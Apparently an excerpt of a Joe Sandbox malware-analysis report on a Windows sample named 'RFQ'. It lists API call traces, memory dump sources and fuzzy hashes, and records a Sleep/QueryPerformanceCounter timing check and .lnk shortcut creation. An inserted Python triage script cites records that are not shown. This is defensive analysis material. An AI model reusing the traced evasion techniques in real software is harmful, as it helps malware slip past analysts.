                                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                          • String ID:
                                                                          • API String ID: 2338827641-0
                                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
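The "APIs" lists above are the Joe Sandbox IDA plugin's per-function call records: one call per line, with the module, the argument values the plugin could recover (`?` where it could not), the call-site address after `ref:`, and a `Part of subcall function` prefix when the call sits in a callee. The Python below is an added example, not part of this report or of Joe Sandbox, that parses that listing into structured records and triages the two functions shown above: the Winsock helper at 004653FE (whose `socket` arguments 2/1/6 are AF_INET, SOCK_STREAM and IPPROTO_TCP, and whose `connect` length 0x10 is `sizeof(sockaddr_in)`) and the `Sleep`/`QueryPerformanceCounter` pair at 00434598 that the report's "execution timing" signature refers to. The regular expression, the dataclass and the helper names are this example's own assumptions about the listing format; the sample text is copied from the two records above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the two "APIs" records copied verbatim from the report
# (the WSOCK32 connect helper and the Sleep/QueryPerformanceCounter timing loop).
SAMPLE_RECORDS = """\
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
"""

# Assumed shape of one listing line (parentheses are absent for no-argument calls):
#   [Part of subcall function ADDR:] NAME.MODULE[(ARG,ARG,...)], ref: ADDR
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_@$][\w@$]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]           # raw hex strings; "?" where the plugin could not resolve the value
    ref: int                  # call-site address
    caller: Optional[int]     # set when the line is a "Part of subcall function" entry


def parse_records(text: str) -> List[List[ApiCall]]:
    """Split the listing on 'APIs' headers and return one call list per function."""
    records: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.search(line)
        if m and current is not None:
            current.append(ApiCall(
                name=m["name"],
                module=m["module"].upper(),
                args=[a.strip() for a in m["args"].split(",")] if m["args"] else [],
                ref=int(m["ref"], 16),
                caller=int(m["caller"], 16) if m["caller"] else None,
            ))
    return records


# Winsock constants for the first three socket() arguments.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def _value(arg: str) -> Optional[int]:
    return None if arg == "?" else int(arg, 16)


def describe_socket(call: ApiCall):
    """Decode socket(af, type, protocol) from the recorded argument values."""
    if call.name != "socket" or len(call.args) < 3:
        return None
    af, typ, proto = (_value(a) for a in call.args[:3])
    return (AF.get(af, f"af={af}"), SOCK_TYPE.get(typ, f"type={typ}"), IPPROTO.get(proto, f"proto={proto}"))


def triage(calls: List[ApiCall]) -> List[str]:
    """Flag an outbound connect sequence and a timing check in one function's call list."""
    names = [c.name for c in calls]
    findings = []
    sock = next((c for c in calls if c.name == "socket"), None)
    if sock is not None and "connect" in names:
        af, typ, proto = describe_socket(sock)
        conn = next(c for c in calls if c.name == "connect")
        namelen = _value(conn.args[2]) if len(conn.args) > 2 else None
        findings.append(f"outbound {typ}/{proto} connect over {af}, sockaddr length {namelen}")
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        findings.append("timing check: QueryPerformanceCounter read twice around Sleep (debugger/sandbox timing)")
    return findings


if __name__ == "__main__":
    for idx, calls in enumerate(parse_records(SAMPLE_RECORDS)):
        print(f"record {idx}: {[c.name for c in calls]}")
        for finding in triage(calls):
            print("  -", finding)
```

Running it on the two records prints the decoded connect sequence for the first function and the timing-check finding for the second; feeding it the rest of this section's "APIs" lists only requires pasting more records into the input string.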
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                          • String ID:
                                                                          • API String ID: 4023252218-0
                                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                          • String ID:
                                                                          • API String ID: 1489400265-0
                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1042038666-0
                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __getptd.LIBCMT ref: 00417826
                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                          • __lock.LIBCMT ref: 00417844
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                          • String ID:
                                                                          • API String ID: 938513278-0
                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 2403457894-0
                                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 4247068974-0
                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )$U$\
                                                                          • API String ID: 0-3705770531
                                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
